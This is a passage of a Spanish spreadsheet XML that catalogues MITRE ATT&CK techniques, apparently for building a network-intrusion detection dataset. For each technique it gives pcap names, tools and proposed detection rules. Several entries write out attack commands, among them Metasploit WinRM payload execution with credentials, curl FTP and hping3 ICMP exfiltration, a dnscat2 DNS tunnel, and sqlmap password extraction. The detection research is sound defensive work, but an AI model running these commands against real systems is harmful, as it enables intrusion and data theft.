    <t>Manual [3] / 3.8.14.5</t>
  </si>
  <si>
    <t>Mútliples actividades de escaneo, incluidas el intento de Shell Remoto aprovechando el conocimiento de la red victima</t>
  </si>
  <si>
    <t>Low Orbit Ion Canon (LOIC) for UDP, TCP, or HTTP requests</t>
  </si>
  <si>
    <t>T1046-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>NO**</t>
  </si>
  <si>
    <t>En determinadas circunstancias, si el envío de paquetes constituye una amenaza de denegación de servicio, podría detectarse el envío masivo de paquetes</t>
  </si>
  <si>
    <t>Los patrones de escaneo por herramientas como LOIC son claros en los flujos.</t>
  </si>
  <si>
    <t>Las actividades de escaneo son ataques</t>
  </si>
  <si>
    <t>Dataset CIC-2018</t>
  </si>
  <si>
    <t>Manual [4] / B.31</t>
  </si>
  <si>
    <t>Shell Remoto - T1071</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y version</t>
  </si>
  <si>
    <t>Nikto</t>
  </si>
  <si>
    <t>T1046-Version_services_detection1_[3].pcapng</t>
  </si>
  <si>
    <t>Múltiples mecanismos. Por ejemplo, regla que detecte un escaneo de puertos (alto número de peticiones hacia un rango de puertos en poco tiempo)</t>
  </si>
  <si>
    <t>Nikto realiza mÃºltiples solicitudes HTTP rápidas que pueden identificarse fácilmente en los flujos.</t>
  </si>
  <si>
    <t>El descubrimiento de servicios y versiones se considera como ataque</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.3</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.3.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.3.5</t>
  </si>
  <si>
    <t>T1046-Version_services_detection2_[3].pcapng</t>
  </si>
  <si>
    <t>nmap genera firmas de escaneo reconocibles mediante flujos por volumen y secuencia de puertos.</t>
  </si>
  <si>
    <t>Ejecución de carga por WinRM</t>
  </si>
  <si>
    <t>Metasploit</t>
  </si>
  <si>
    <t>T1047-WinRM_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte intento de ejecucion de código shell en un equipo aprovechando vulnerabilidades en WinRM</t>
  </si>
  <si>
    <t>Flujos permiten ver conexiones en puertos de VNC; DPI permite inspeccionar contenido para detectar autenticaciones y comandos.</t>
  </si>
  <si>
    <t>Ejecucion de payload en un equipo mediante WinRM. Comando: msfconsole -x "use exploit/windows/winrm/winrm_script_exec; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; set LPORT 5555; set username administrator; set password vagrant; set force_vbs true; run -z; sessions -c 'cmdkey /list'; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>El aprovechamiento de la vulnerabilidad de la herramienta WinRM hace que este ataque siempre se comporte como tal (aunque la ejecución de código remoto también pueda darse en contextos legítimos)</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.4.1</t>
  </si>
  <si>
    <t>Manual [4] / B.26</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.1.5</t>
  </si>
  <si>
    <t>Establecimiento de sesión remota mediante Metasploit - T1059</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltración por FTP</t>
  </si>
  <si>
    <t>T1048.003-Exfiltration_over_FTP_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte FTP STOR</t>
  </si>
  <si>
    <t>Flujos identifican uso de puertos típicos de WinRM; DPI permite inspeccionar contenido de comandos.</t>
  </si>
  <si>
    <t>Exfiltracion de datos utilizando el protocolo FTP. Utilizando caldera y la operacion Advanced Thief. Comando: curl -T stage_to_steal.tar.gz.gpg ftp://172.16.1.2/VictimDirectory/ --user "dit:dit"</t>
  </si>
  <si>
    <t>El uso de FTP para enviar datos se corresponde con un ataque</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.15</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.15.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.15.5</t>
  </si>
  <si>
    <t>Exfiltración por ICMP</t>
  </si>
  <si>
    <t>ICMP</t>
  </si>
  <si>
    <t>hping3</t>
  </si>
  <si>
    <t xml:space="preserve">T1048.003-Exfiltration_over_ICMP_[2].pcapng </t>
  </si>
  <si>
    <t>Aunque hay reglas para detectar ICMP inusual, muchas veces el canal puede camuflarse fácilmente. Podría considerarse SI* o incluso NO* si la técnica es sofisticada.</t>
  </si>
  <si>
    <t>Flujos identifican accesos a servicios cloud no autorizados; DPI puede detectar transferencias o comandos maliciosos.</t>
  </si>
  <si>
    <t>Exfiltracion mediante protocolo ICMP. Envia varios echo Request que contienen como datos el contenido de ese fichero. Comando: echo "Esto es un exfiltración sobre ICMP" &gt; file;timeout 15s hping3 --file ./file --data 36 192.168.2.2 --icmp</t>
  </si>
  <si>
    <t>El uso de ICMP para enviar datos se corresponde con un ataque</t>
  </si>
  <si>
    <t>Manual [2] /  3.2.2.1</t>
  </si>
  <si>
    <t>Manual [4] / B.27</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.2.2</t>
  </si>
  <si>
    <t>Execution, Privilege Escalation</t>
  </si>
  <si>
    <t>At</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>Ejecución de tarea mediante uso de comando at para programar la hora de la ejecución</t>
  </si>
  <si>
    <t>Caldera, At</t>
  </si>
  <si>
    <t>T1053.002-Scheduled_TaskJob_At_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso de comando At para programar tareas a una determinada hora o momento</t>
  </si>
  <si>
    <t>Flujos detectan puertos usados por ARD; DPI permite inspección de contenido para detectar patrones.</t>
  </si>
  <si>
    <t xml:space="preserve">El ataque consiste en ejecutar una orden en el equipo remoto mediante el uso de At, programando la hora de ejecución de dicha orden. De esta forma, puede obtenerse persistencia, por ejemplo. </t>
  </si>
  <si>
    <t>La programacion de una tarea no necesariamente tiene porque ser un ataque</t>
  </si>
  <si>
    <t>Manual [5] / 4.3.3</t>
  </si>
  <si>
    <t>Manual [5] / C.42</t>
  </si>
  <si>
    <t>Manual [5] / 5.5.5</t>
  </si>
  <si>
    <t>Establecimiento de sesión con herramienta Sandcat - T1059</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Eliminación de conexiones establecidas via Network Share en Windows</t>
  </si>
  <si>
    <t>T1070-Indicator_removal_network_share_connection_removal_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en desconexión repentina procedente de una dirección de varios recursos compartidos</t>
  </si>
  <si>
    <t>Flujos detectan uso del puerto 22; DPI puede detectar autenticaciones o actividad en la sesión SSH.</t>
  </si>
  <si>
    <t>La eliminación de conexiones establecidas con Network Share de Windows es legítima en ciertos contextos</t>
  </si>
  <si>
    <t>Manual [4] /  3.8</t>
  </si>
  <si>
    <t>Manual [4] / B.8</t>
  </si>
  <si>
    <t>Manual [4] / 4.8</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>Command - Control via DNS</t>
  </si>
  <si>
    <t>dnscat2</t>
  </si>
  <si>
    <t>T1071-Tunel_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecta uso de dnscat</t>
  </si>
  <si>
    <t>Flujos detectan conexiones en el puerto 23; DPI permite ver comandos enviados por Telnet.</t>
  </si>
  <si>
    <t>Envio de peticiones DNS como canal de comunicaciones con la víctima. Comando: timeout 15s /root/dnscat2/client/dnscat --dns server=192.168.2.2,port=53 --secret= acabc17b6904a7f8fada4e7f8de4bce8 --no-encryption</t>
  </si>
  <si>
    <t>La ocultación de un canal C&amp;C haciendo uso de un tunel DNS siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [1] /  5.2.3</t>
  </si>
  <si>
    <t>Manual [1] / E.17</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.30</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Descubrimiento de cuentas de dominio en entorno Active Directory</t>
  </si>
  <si>
    <t>Caldera, net</t>
  </si>
  <si>
    <t>T1087.002-AccountDiscovery_DomainAccount_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte uso de comandos para enumerar los usuarios o grupos del dominio como net user /domain o net group /domain</t>
  </si>
  <si>
    <t>Flujos detectan transferencia de archivos inusuales; DPI permite identificar protocolos como FTP/SCP.</t>
  </si>
  <si>
    <t>Ejecución de comandos mediante CMD para enumerar usuarios y grupos del dominio</t>
  </si>
  <si>
    <t>El descubrimiento de cuentas de un dominio AD puede confundirse con actividades de un administrador de red</t>
  </si>
  <si>
    <t>Manual [5] / 4.6.2</t>
  </si>
  <si>
    <t>Manual [5] / C.44</t>
  </si>
  <si>
    <t>Manual [5] / 5.8.6</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Uso de Equipo interno como Proxy para el ataque C2</t>
  </si>
  <si>
    <t>T1090-Proxy_internal_proxy_[4].pcapng</t>
  </si>
  <si>
    <t>Aunque sí es detectable la conexión C2 directa con el atacante, no existe un mecanismo de detección concreto que pueda identificar el uso de un proxy, más allá de una detección por anomalías, como la repetición de paquetes, dando a entender que un equipo interno está replicando paquetes, y por tanto está actuando como proxy</t>
  </si>
  <si>
    <t>RPC requiere inspección profunda del contenido del paquete debido a puertos dinámicos y complejidad del protocolo.</t>
  </si>
  <si>
    <t>El uso de un equipo interno como Proxy para comunicaciones C&amp;C siempre es ataque</t>
  </si>
  <si>
    <t>Manual [4] /  3.20</t>
  </si>
  <si>
    <t>Manual [4] / B.20</t>
  </si>
  <si>
    <t>Manual [4] / 4.20</t>
  </si>
  <si>
    <t>Establecimiento de canal C&amp;C mediante Covenant - Command and Control</t>
  </si>
  <si>
    <t>Usar un protocolo que no sea de la capa de Aplicacion en el modelo OSI para esconder la conexión de C2. En este caso utilizamos TCP</t>
  </si>
  <si>
    <t>Caldera, manx</t>
  </si>
  <si>
    <t>T1095-Non_Application_Layer_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío de comandos o comunicaciones C&amp;C en puertos no comunes o haciendo uso de servicios distintos de capa de aplicación</t>
  </si>
  <si>
    <t>Flujos detectan conexiones persistentes a C2; DPI detecta firmas o comandos específicos de RATs.</t>
  </si>
  <si>
    <t>Utilizar la herramienta manx de Caldera para crear sesión C2 mediante TCP</t>
  </si>
  <si>
    <t>El uso de un protocolo distinto de capa de aplicación para ataques C&amp;C siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.13</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.13.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.13.5</t>
  </si>
  <si>
    <t>Agente Caldera para el establecimiento de la sesión - Command and Control</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>Subida de información confidencial a Workspace de Google Drive</t>
  </si>
  <si>
    <t>Covenant, Google Drive API</t>
  </si>
  <si>
    <t>T1102.003-Web_service-one_way_communication_[4].pcapng</t>
  </si>
  <si>
    <t>NO*</t>
  </si>
  <si>
    <t>No detectable con firmas básicas, pero puede haber detección con reglas específicas si se identifican patrones de uso de API de Drive o acceso persistente inusual. Requiere reglas específicas no estándar para APIs.</t>
  </si>
  <si>
    <t>Flujos identifican uso de puertos como 443 con RD Gateway; DPI permite inspección de tráfico para detectar comandos.</t>
  </si>
  <si>
    <t>El uso de un servicio Web para subir datos puede confundirse a menudo con actividades legítimas</t>
  </si>
  <si>
    <t>Manual [4] /  3.21</t>
  </si>
  <si>
    <t>Manual [4] / B.21</t>
  </si>
  <si>
    <t>Manual [4] / 4.21</t>
  </si>
  <si>
    <t>Sesión Remota + Ataque C2</t>
  </si>
  <si>
    <t>RDP, Covenant</t>
  </si>
  <si>
    <t>T1104-Multi_stage_channels_[4].pcapng</t>
  </si>
  <si>
    <t>Si se usa Covenant sobre RDP, hay posibilidades de detección si se inspecciona tráfico al canal o se monitoriza el RDP como vector. Detectable en ciertos contextos con inspección de protocolo RDP o tráfico HTTP posterior (Covenant).</t>
  </si>
  <si>
    <t>Flujos detectan uso de puertos típicos de gestión; DPI permite analizar comandos o actividades sospechosas.</t>
  </si>
  <si>
    <t>El uso de varias fases y frentes de ataque en una comunicación C&amp;C es siempre un ataque</t>
  </si>
  <si>
    <t>Manual [4] /  3.22</t>
  </si>
  <si>
    <t>Manual [4] / B.22</t>
  </si>
  <si>
    <t>Manual [4] / 4.22</t>
  </si>
  <si>
    <t>Transferencia de archivos de un servidor C2 a un equipo previamente comprometido</t>
  </si>
  <si>
    <t>Metasploit, FTP</t>
  </si>
  <si>
    <t>T1105-Ingress_Tool_Transfer_[5].pcapng</t>
  </si>
  <si>
    <t>Reglas genéricas que detecten un traspaso de archivos entre equipos utilizando protocolos de transferencia de ficheros como SMB, FTP... Dependiendo de las circunstancias del ataque tambien es importante detectar la transferencia de archivos malware que sean detectables mediante tráfico de red.</t>
  </si>
  <si>
    <t>Flujos detectan patrones de acceso remoto; DPI inspecciona comandos transmitidos por la shell remota.</t>
  </si>
  <si>
    <t>Servidor FTP en el servidor C2. A través de la conexión del atacante a la víctima, usando el comando ftp transferimos herramientas desde el servidor C2 a la víctima</t>
  </si>
  <si>
    <t>La transferencia de herramientas de ingreso siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.1</t>
  </si>
  <si>
    <t>Manual [5] / C.2</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.7</t>
  </si>
  <si>
    <t>Modificación del Registro de forma remota</t>
  </si>
  <si>
    <t>WINREG</t>
  </si>
  <si>
    <t>reg (Remoto)</t>
  </si>
  <si>
    <t>T1112-Modify_registry_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla que detecte el envío de mensajes con protocolo WINREG o Remote Registry Service </t>
  </si>
  <si>
    <t>Flujos identifican puertos de gestión; DPI analiza sesiones en busca de comportamientos anómalos.</t>
  </si>
  <si>
    <t>La modificación del registro de forma remota en ciertos contextos puede tratarse de actividad legítima</t>
  </si>
  <si>
    <t>Manual [4] /  3.9</t>
  </si>
  <si>
    <t>Manual [4] / B.9</t>
  </si>
  <si>
    <t>Manual [4] / 4.9</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Recolección de correos electrónicos de un servidor Microsoft Exchange haciendo uso de credenciales robadas</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>T1114-Email_collection_remote_email_collection_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el intento de extracción de información relacionada con los correos electrónicos de una empresa alojados en un servidor Microsoft Exchange</t>
  </si>
  <si>
    <t>Puede detectarse por flujos (extracción inusual de datos de correo) o por paquetes (contenido específico HTTP con cabeceras/email).</t>
  </si>
  <si>
    <t>La recolección de correos electrónicos de un servidor Microsoft Exchange puede tratarse de una acción legítima en algunos contextos</t>
  </si>
  <si>
    <t>Manual [4] /  3.16</t>
  </si>
  <si>
    <t>Manual [4] / B.16</t>
  </si>
  <si>
    <t>Manual [4] / 4.16</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Codificacion de mensajes entre la victima y el C2 Server mediante Base64</t>
  </si>
  <si>
    <t>Metasploit, curl, base64</t>
  </si>
  <si>
    <t>T1132.001-Standard_Encoding_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por anomalias</t>
  </si>
  <si>
    <t>Codificación base64 puede generar patrones detectables en flujos (volumen, frecuencia) o por inspección del contenido HTTP.</t>
  </si>
  <si>
    <t>Servidor HTTP en el C2 Server. Intercambio de mensajes entre la victima y atacante mediante base64</t>
  </si>
  <si>
    <t>La codificación en base 64 de un canal c2 siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [5] / 4.8.2</t>
  </si>
  <si>
    <t>Manual [5] / C.3</t>
  </si>
  <si>
    <t>Manual [5] /  5.11.8</t>
  </si>
  <si>
    <t>Acceso a red VPN desde dispositivo no autorizado con credenciales robadas</t>
  </si>
  <si>
    <t>OpenVPN</t>
  </si>
  <si>
    <t>T1133-External_remote_services_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Existen varias variantes.
        Circunstancias concretas del ataque: el atacante realiza alguna interacción posterior una vez ha logrado acceder a la red (aplicable a esta técnica) como un escaneo de red o mensajes de anuncio de Host.
        Reglas personalizadas: regla que compruebe si las direcciones IP involucradas en los paquetes se corresponden con las autorizadas dentro de la red VPN (debe ser configurada manualmente).
</t>
  </si>
  <si>
    <t>El establecimiento de túneles VPN puede detectarse por análisis de flujo (puertos, duración, frecuencia), pero no por contenido DPI.</t>
  </si>
  <si>
    <t>Acceso a red VPN, sin interacciones adicionales más allá de las naturales al propio acceso</t>
  </si>
  <si>
    <t>El acceso a una red VPN es una acción legítima en algunos contextos</t>
  </si>
  <si>
    <t>Manual [4] /  3.3</t>
  </si>
  <si>
    <t>Manual [4] / B.3</t>
  </si>
  <si>
    <t>Manual [4] / 4.3</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Instalación de Plugin en Navegador Chrome que reenvía información relacionada con búsquedas del usuario a un servidor</t>
  </si>
  <si>
    <t>Malicious-browser-extension</t>
  </si>
  <si>
    <t>T1176-Browser-extension_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en flujos de datos hacia direcciones no relacionadas con las búsquedas, normalmente en formato de objetos JavaScript</t>
  </si>
  <si>
    <t>DPI ayuda a identificar contenido JS malicioso; flujos detectan dominios anómalos.</t>
  </si>
  <si>
    <t>El uso de una extensión maliciosa que publica información confidencial siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [4] /  3.7</t>
  </si>
  <si>
    <t>Manual [4] / B.7</t>
  </si>
  <si>
    <t>Manual [4] / 4.7</t>
  </si>
  <si>
    <t>Forzar intento de autenticación en un servidor para obtener credenciales de acceso</t>
  </si>
  <si>
    <t>SMB, NTLMssp-Extract</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication_[5].pcapng</t>
  </si>
  <si>
    <t>Monitorizar tráfico SMB en puertos TCP 139,445, puerto UDP 137 y tráfico WebDAV</t>
  </si>
  <si>
    <t>Tráfico SMB anómalo (puertos 445/139) puede detectarse por flujo; también posible detectar cabeceras SMB/NTLM con DPI.</t>
  </si>
  <si>
    <t>Servidor SMB. El atacante captura el tráfico de red del intento de autenticación mediante Wireshark y aplica fuerza bruta a las credenciales capturadas</t>
  </si>
  <si>
    <t>Forzar un intento de autenticación siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [5] / 4.5.1</t>
  </si>
  <si>
    <t>Manual [5] / C.4</t>
  </si>
  <si>
    <t>Manual [5] /  5.7.4</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication2_[5].pcapng</t>
  </si>
  <si>
    <t>Cada instancia de ataque se corresponde con una solicitud al server SMB con el usuario y contraseñas en el paquete</t>
  </si>
  <si>
    <t>HTML Exploit I - HTML Compilador</t>
  </si>
  <si>
    <t>Apache, Shadyantra</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v1_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el aprovechamiento de una vulnerabilidad del navegador Mozilla Firefox para llevar a cabo una compilación de código en la víctima</t>
  </si>
  <si>
    <t>Explotación de navegador requiere inspección de contenido HTML para detectar código embebido malicioso.</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para compilar código malware (no ejecutar)</t>
  </si>
  <si>
    <t>El uso de un exploit para compilar código en la víctima siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [4] /  3.4</t>
  </si>
  <si>
    <t>Manual [4] / B.4</t>
  </si>
  <si>
    <t>Manual [4] / 4.4</t>
  </si>
  <si>
    <t>HTML Exploit II - Descarga de Ejecutable</t>
  </si>
  <si>
    <t>T1189-Drive-by_compromise_v2_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte la descarga no autorizada de un archivo .exe (ejecutable) en el equipo víctima desde una página web posiblemente fraudulenta</t>
  </si>
  <si>
    <t xml:space="preserve"> Descarga de ejecutable sólo es detectable con inspección del contenido HTTP (cabeceras, nombre del archivo).</t>
  </si>
  <si>
    <t>Carga de página web con exploit HTML para descargar malware en formato ejecutable .exe</t>
  </si>
  <si>
    <t>La descarga no autorizada de un ejecutable no siempre es un ataque</t>
  </si>
  <si>
    <t>Inyección SQL</t>
  </si>
  <si>
    <t>Damn Vulnerable Web App (DVWA)</t>
  </si>
  <si>
    <t>T1190-Sql_injection-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que detecte posibles cadenas asociadas a un ataque de inyección SQL en sentencias HTML</t>
  </si>
  <si>
    <t>Inyección SQL requiere examinar contenido del paquete (URL, payload HTTP) para detectar patrones maliciosos.</t>
  </si>
  <si>
    <t>Una inyección SQL siempre constituye un ataque</t>
  </si>
  <si>
    <t>Manual [4] / B.34</t>
  </si>
  <si>
    <t>Sqlmap</t>
  </si>
  <si>
    <t>T1190-Sql_inyection1_[3].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte un posible intento al esquema de informacion de un servidor MySQL. Regla que detecte una sentencia SQL pudiendose tratar de una posible inyeccion SQL. Regla que detecte posible escaneo de vulnerabilidades de inyeccion SQL.</t>
  </si>
  <si>
    <t>Uso de Sqlmap automatiza payloads que solo DPI puede identificar en la capa de aplicación.</t>
  </si>
  <si>
    <t>Ejecucion de comando mediante sqlmap para probar diferentes SQL Injections a una página web. Comando: sqlmap -u http://192.168.2.2/payroll_app.php --forms --batch --passwords</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.5</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.5.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.5.5</t>
  </si>
  <si>
    <t>curl, DVWA</t>
  </si>
  <si>
    <t>T1190-SQL_Injection_High_Bytes1_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte un posible intento de inyección SQL en la URL de una petición</t>
  </si>
  <si>
    <t>Inyección SQL en URL solo es detectable inspeccionando el contenido del paquete HTTP (parámetros y payloads).</t>
  </si>
  <si>
    <t>Instalado un servidor DVWA (servidor con vulnerabilidades) se realiza una inyección SQL a una URL añadiendo caracteres de relleno</t>
  </si>
  <si>
    <t>Manual [4] / 3.26</t>
  </si>
  <si>
    <t>Manual [4] / B.39</t>
  </si>
  <si>
    <t>Manual [4] / 4</t>
  </si>
  <si>
    <t>T1190-SQL_Injection_High_Bytes2_[4].pcapng</t>
  </si>
  <si>
    <t>T1190-Sql_inyection2_[2].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve"> Ataques con Sqlmap requieren inspección profunda del contenido para identificar comandos SQL.</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.3.1</t>
  </si>
  <si>
    <t>Manual [4] / B.28</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.2</t>
  </si>
  <si>
    <t>Establecimiento de tarea BITS en equipo Windows para garantizar persistencia trás reinicio del equipo</t>
  </si>
  <si>
    <t>BITSADMIN,METASPLOIT</t>
  </si>
  <si>
    <t>T1197-BITS_Jobs_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte la presencia de cadenas en el contenido de los paquetes como "Microsoft BITS" y ".exe", alertando del intento de creación de una tarea BITS</t>
  </si>
  <si>
    <t>Detectable al inspeccionar el contenido de los paquetes buscando cadenas como "BITS" o nombres de ejecutables.</t>
  </si>
  <si>
    <t>Ejecución de comandos para la creación de una tarea BITS con rastro de red</t>
  </si>
  <si>
    <t>El establecimiento de tareas BITS puede considerarse como tráfico legítimo o como ataque</t>
  </si>
  <si>
    <t>Manual [5] /  4.3.1</t>
  </si>
  <si>
    <t>Manual [5] / C.5</t>
  </si>
  <si>
    <t>Manual [5] /  5.5.2</t>
  </si>
  <si>
    <t>Descarga de Malware previa - T1105</t>
  </si>
  <si>
    <t>Uso de una conexión RDP sin proteger para el acceso a un equipo</t>
  </si>
  <si>
    <t>RDP</t>
  </si>
  <si>
    <t>T1199-Trusted_relationship_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">El ataque tiene un matiz clave. Si bien el ataque puede ser detectado por Snort (existen muchas variantes, aunque para esta instancia concreta, por ejemplo, sí que existe mecanismo de detección), el hecho de que se trate de un ataque procedente de un dominio de confianza infectado, dificulta su detección, pues bloquear estos paquetes podría imposibilitar comunicación con el dominio de confianza si no existiera amenaza </t>
  </si>
  <si>
    <t>Aunque hay patrones de flujo, detectar RDP malicioso específico (como secuencias de control) requiere inspección de paquetes.</t>
  </si>
  <si>
    <t>El uso de una conexión RDP para ganar acceso a un equipo no siempre constituye un ataque, depende del contexto</t>
  </si>
  <si>
    <t>Manual [4] /  3.5</t>
  </si>
  <si>
    <t>Manual [4] / B.5</t>
  </si>
  <si>
    <t>Manual [4] / 4.5</t>
  </si>
  <si>
    <t>Adición de Hardware</t>
  </si>
  <si>
    <t>SSH Server + USB(Simular USB con MV con SO)</t>
  </si>
  <si>
    <t>T1200-Hardware_Additions_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique desviaciones en el tráfico de red, tales como metadatos o protocolos de gestión (DHCP,...) fuera de los habituales</t>
  </si>
  <si>
    <t>Detectable por anomalías en tráfico o cambios en flujos de red asociados a nuevos dispositivos; no se inspecciona contenido.</t>
  </si>
  <si>
    <t>Aparición de una nueva MV en el entorno de la víctima simulando la insercion de un USB tipo Pwn Plug que se utiliza como nodo de acceso a la red de la víctima para posteriormente, aprovechando que el puerto de la víctima esta abierto, acceder al equipo.</t>
  </si>
  <si>
    <t>Añadir un equipo hardware a una red siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [5] /  4.2.1</t>
  </si>
  <si>
    <t>Manual [5] / C.6</t>
  </si>
  <si>
    <t xml:space="preserve"> Manual [5] / 5.3.4</t>
  </si>
  <si>
    <t>Ataque con Botnet</t>
  </si>
  <si>
    <t>Ares, Screenshot and key logging</t>
  </si>
  <si>
    <t>T1203-Botnet_C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Algunas botnets conocidas como Ares tienen patrones de red (canales IRC, beaconing) y existen reglas específicas. Detectable con reglas específicas si se conoce el malware o canal C2.</t>
  </si>
  <si>
    <t>Botnets pueden detectarse por patrones de flujo (beaconing, canales IRC) o por firmas en paquetes (payloads conocidos).</t>
  </si>
  <si>
    <t>Un ataque con botnet siempre es un ataque</t>
  </si>
  <si>
    <t>Manual [4] / B.35</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>Enlace malicioso</t>
  </si>
  <si>
    <t>wget</t>
  </si>
  <si>
    <t>T1204.001-malicious_link_[3].pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías</t>
  </si>
  <si>
    <t>Enlaces maliciosos son redirecciones cuya detección depende del comportamiento de conexión más que del contenido específico.</t>
  </si>
  <si>
    <t>Redireccion al pinchar en un enlace a un sitio malicioso. Comando : wget http://172.16.1.2 (Desde la víctima)</t>
  </si>
  <si>
    <t>Un enlace malicioso a veces puede ser considerado como tráfico legítimo dependiendo de las circuntstancias</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.17</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.17.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.17.5</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Esconder y activar un puerto de forma remota</t>
  </si>
  <si>
    <t>Knockd</t>
  </si>
  <si>
    <t>T1205.001-Port_Knocking_[3].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en base a una actividad sospechosa en un puerto concreto</t>
  </si>
  <si>
    <t>Port Knocking genera patrones específicos en flujos (puertos secuenciales); el contenido del paquete es irrelevante.</t>
  </si>
  <si>
    <t>Ocultar y activar un puerto remotamente, haciendo primero peticiones a ciertos puertos de forma secuencial. Comando: knock -v 172.16.2.2 7000 8000 9000</t>
  </si>
  <si>
    <t>El Port Knocking siempre se considera un ataque</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.11</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.11.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.11.5</t>
  </si>
  <si>
    <t>DCShadow: registro de un DC fraudulento para habilitar la manipulación de datos en un entorno Active Directory</t>
  </si>
  <si>
    <t>T1207-Rogue_domain_controller_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte una llamada a la función DRSUAPI_REPLICA_ADD (5), o un intento de aprovechamiento de una vulnerabilidad de la misma</t>
  </si>
  <si>
    <t>Requiere identificar funciones específicas del protocolo RPC (como DRSUAPI_REPLICA_ADD), lo cual necesita inspección de paquetes.</t>
  </si>
  <si>
    <t>El registro de un DC fraudulento para habilitar la manipulación de datos siempre es un ataque (aunque las tareas realizadas posteriormente puedan realizarse también en un entorno legítimo)</t>
  </si>
  <si>
    <t>Manual [4] /  3.10</t>
  </si>
  <si>
    <t>Manual [4] / B.10</t>
  </si>
  <si>
    <t>Manual [4] / 4.10</t>
  </si>
  <si>
    <t>EternalBlue</t>
  </si>
  <si>
    <t>SMB</t>
  </si>
  <si>
    <t>T1210-Eternal_blue_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte uso de EternalBlue</t>
  </si>
  <si>
